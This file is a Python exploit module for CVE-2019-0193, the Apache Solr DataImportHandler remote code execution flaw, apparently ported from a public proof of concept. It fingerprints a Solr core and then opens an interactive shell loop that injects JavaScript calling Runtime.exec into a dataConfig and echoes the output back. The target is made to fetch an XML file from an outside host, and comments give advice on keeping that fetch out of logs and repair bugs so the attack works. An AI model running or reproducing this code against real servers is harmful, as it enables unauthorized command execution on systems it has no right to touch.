#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Name: Example module file
Creator: K4YT3X
Date Created: June 22, 2021
Last Modified: June 22, 2021
Note: the code in run is not written by me
"""
import json
import requests
import sys
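class Module:
    """Exploit module for CVE-2019-0193: Apache Solr DataImportHandler RCE.

    Port of the zhzyker/exphub PoC into this framework's ``Module`` interface
    (``options`` dict, ``info()``, ``run()``).  ``run()``:

    1. asks ``/solr/admin/cores`` for the first core name;
    2. checks that ``/solr/<core>/admin/mbeans?cat=QUERY`` reports
       ``/dataimport`` backed by
       ``org.apache.solr.handler.dataimport.DataImportHandler``;
    3. drops into a read-eval loop that POSTs a ``full-import`` with
       ``debug=true`` and an inline ``dataConfig`` whose script transformer
       calls ``java.lang.Runtime.getRuntime().exec(cmd)`` and copies the
       command output into the ``title`` field, which is read back from the
       ``documents`` list of the response.

    Operational caveats, all visible in the request that gets sent:

    * the ``dataConfig`` entity makes the *target* fetch an XML document from
      ``xml_url`` (default: a file on raw.githubusercontent.com).  The target
      needs egress to that host and the fetch shows up in its logs; host the
      file yourself and set the ``xml_url`` option when that matters.  The
      entity iterates ``/RDF/item``, so a self-hosted copy must keep that
      structure.
    * the ``Host`` header is pinned to ``localhost:8983`` exactly as in the
      original PoC; behind a name-based reverse proxy that may not reach the
      intended vhost.
    * the command runs through ``Runtime.exec(String)`` on the target, not a
      shell — NOTE(review): expect pipes/redirections and shell quoting not to
      behave as in a shell; confirm against the target before relying on them.

    Fixes over the pasted PoC: scheme prefix was ``"http:https://"``;
    ``str.format`` was applied to a template full of JavaScript braces and
    raised ``ValueError`` on every call; ``sys.exit`` killed the hosting
    framework; an unregistered ``/dataimport`` escaped as ``KeyError``.
    """

    # XML document the target's URLDataSource fetches (the one the original
    # PoC pointed at).  Overridable per run through the ``xml_url`` option.
    XML_URL = (
        "https://raw.githubusercontent.com/1135/solr_exploit/master/"
        "URLDataSource/demo.xml"
    )

    # Handler class the mbeans check must report for /dataimport.
    DIH_CLASS = "org.apache.solr.handler.dataimport.DataImportHandler"

    def __init__(self, logger):
        self.logger = logger
        # ``url`` is the only key the original required; ``xml_url`` is new and
        # optional, so callers that only set ``url`` keep working unchanged.
        self.options = {
            "url": {"value": None, "required": True},
            "xml_url": {"value": self.XML_URL, "required": False},
        }

    def info(self):
        return """DES: by zhzyker as https://github.com/zhzyker/exphub
Solr DataImportHandler Commons Remote Code Execution"""

    @staticmethod
    def _normalize_url(raw):
        """Return *raw* as ``scheme://host[:port]`` without a trailing slash.

        The original prefixed ``"http:https://"`` to scheme-less input, which
        is not a usable URL; a bare ``host:port`` now becomes
        ``http://host:port``.  A trailing ``/`` is dropped so the ``/solr/...``
        paths appended later do not produce ``//solr``.
        """
        raw = raw.strip()
        if not raw.startswith(("http://", "https://")):
            raw = "http://" + raw
        return raw.rstrip("/")

    @staticmethod
    def _headers(base):
        """Browser-looking request headers, as in the original PoC.

        ``Content-Length`` is deliberately left out: requests derives it from
        the encoded body (and replaces any value given here), so the PoC's
        hard-coded ``1007`` never did anything.  ``Host`` is kept pinned to
        ``localhost:8983`` like the PoC (see class docstring).
        """
        return {
            "Host": "localhost:8983",
            "User-Agent": (
                "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
            ),
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            # The PoC advertised "zip", which is not a content coding; gzip is.
            "Accept-Encoding": "gzip, deflate",
            "Referer": base + "/solr/",
            "Content-type": "application/x-www-form-urlencoded",
            "X-Requested-With": "XMLHttpRequest",
            "Connection": "close",
        }

    @staticmethod
    def _build_data_config(cmd, xml_url):
        """Return the DIH ``dataConfig`` XML that runs *cmd* on the target.

        *cmd* is embedded as a JavaScript string literal via ``json.dumps`` so
        quotes and backslashes cannot break out of ``exec("...")``; *xml_url*
        is embedded with ``quoteattr`` so it cannot break the attribute.  The
        script sits in a CDATA section, so ``]]>`` inside *cmd* would still
        cut the XML short; that input is rejected.

        Args:
            cmd: command line handed to ``Runtime.exec`` on the target.
            xml_url: URL the target's URLDataSource will fetch.

        Raises:
            ValueError: if *cmd* contains ``]]>``.
        """
        from xml.sax.saxutils import quoteattr

        if "]]>" in cmd:
            raise ValueError("command must not contain ']]>'")
        js_cmd = json.dumps(cmd)
        # The pasted PoC pushed this text through str.format(): the JavaScript
        # braces are parsed as replacement fields and raise ValueError before
        # anything is sent.  Plain concatenation has no such problem.
        return (
            "<dataConfig>\n"
            '<dataSource type="URLDataSource"/>\n'
            "<script><![CDATA[\n"
            "function poc(row){\n"
            "var bufReader = new java.io.BufferedReader("
            "new java.io.InputStreamReader("
            "java.lang.Runtime.getRuntime().exec(" + js_cmd + ").getInputStream()));\n"
            "var result = [];\n"
            "while(true) {\n"
            "var oneline = bufReader.readLine();\n"
            "result.push( oneline );\n"
            "if(!oneline) break;\n"
            "}\n"
            'row.put("title",result.join("\\n\\r"));\n'
            "return row;\n"
            "}\n"
            "]]></script>\n"
            "<document>\n"
            '<entity name="entity1"\n'
            "url=" + quoteattr(xml_url) + "\n"
            'processor="XPathEntityProcessor"\n'
            'forEach="/RDF/item"\n'
            'transformer="script:poc">\n'
            '<field column="title" xpath="/RDF/item/title" />\n'
            "</entity>\n"
            "</document>\n"
            "</dataConfig>"
        )

    @classmethod
    def _form_fields(cls, core, cmd, xml_url):
        """Form fields for the ``/solr/<core>/dataimport`` POST.

        Returned as a dict so requests url-encodes each field; the original
        PoC sent one pre-built string, leaving ``&``, ``+`` and ``%`` in the
        command or XML unencoded.  ``core`` carries the discovered core name
        instead of the PoC's hard-coded ``test``.  ``debug=true`` is what the
        PoC relies on: the command output is read back from the ``documents``
        list of the response.

        Raises:
            ValueError: propagated from ``_build_data_config``.
        """
        return {
            "command": "full-import",
            "verbose": "false",
            "clean": "false",
            "commit": "false",
            "debug": "true",
            "core": core,
            "name": "dataimport",
            "dataConfig": cls._build_data_config(cmd, xml_url),
        }

    def _first_core(self, base):
        """Return the first core name listed by ``/solr/admin/cores``.

        Returns ``None`` when the request fails, the reply is not JSON, or no
        core is listed — all treated as "not vulnerable", as the PoC did.
        """
        try:
            reply = requests.get(
                base + "/solr/admin/cores",
                params={"indexInfo": "false", "wt": "json"},
                timeout=20,
            )
            return next(iter(json.loads(reply.text)["status"]))
        except (requests.RequestException, ValueError, KeyError, TypeError, StopIteration):
            return None

    def _dataimport_class(self, base, core):
        """Return the class string reported for ``/dataimport`` in the QUERY mbeans.

        Mirrors the PoC's lookup: element ``[1]`` of ``solr-mbeans`` is read as
        the dict of QUERY handlers and its ``/dataimport`` entry's ``class`` is
        returned.  ``None`` when the handler is not registered or the call
        fails; the original let that ``KeyError`` escape and crash the module.
        """
        try:
            reply = requests.get(
                base + "/solr/" + core + "/admin/mbeans",
                params={"cat": "QUERY", "wt": "json"},
                timeout=20,
            )
            beans = json.loads(reply.text)["solr-mbeans"]
            return beans[1]["/dataimport"]["class"]
        except (requests.RequestException, ValueError, KeyError, IndexError, TypeError):
            return None

    def _exec(self, exp_url, headers, core, cmd, xml_url):
        """POST one command to *exp_url*; return its output or ``None``.

        ``None`` means the output was not echoed back (response not JSON, no
        ``documents``, or the request itself failed — the last one is logged).
        """
        try:
            form = self._form_fields(core, cmd, xml_url)
        except ValueError as exc:
            self.logger.error(str(exc))
            return None
        try:
            reply = requests.post(exp_url, data=form, headers=headers, timeout=30)
        except requests.RequestException as exc:
            self.logger.error("request to {} failed: {}".format(exp_url, exc))
            return None
        try:
            return json.loads(reply.text)["documents"][0]["title"]
        except (ValueError, KeyError, IndexError, TypeError):
            return None

    def run(self):
        """Validate options, fingerprint the target, then open the command loop.

        Every failure path returns instead of calling ``sys.exit`` so a
        non-vulnerable target does not take the hosting framework down.
        """
        for key, opt in self.options.items():
            if opt["value"] is None and opt["required"] is True:
                self.logger.error("Required key {} is not set".format(key))
                return
        base = self._normalize_url(self.options["url"]["value"])
        xml_url = self.options["xml_url"]["value"] or self.XML_URL

        core = self._first_core(base)
        if core is None:
            self.logger.error("Vulnerability does not exist.")
            return
        handler = self._dataimport_class(base, core)
        if handler is None or self.DIH_CLASS not in handler:
            self.logger.error("Vulnerability does not exist.")
            return
        print("\033[32m[INFO]\033[0m Find more:" + handler)

        exp_url = base + "/solr/" + core + "/dataimport"
        headers = self._headers(base)
        while True:
            try:
                cmd = input("[SHELL] terminal > ")
            except (EOFError, KeyboardInterrupt):
                print()
                return
            if cmd.strip() == "exit":
                return
            if not cmd.strip():
                continue
            output = self._exec(exp_url, headers, core, cmd, xml_url)
            if output is None:
                # The PoC's original hint: the import may still be running.
                print("[*] Please wait... ... (About 1 minute)")
            else:
                print(output)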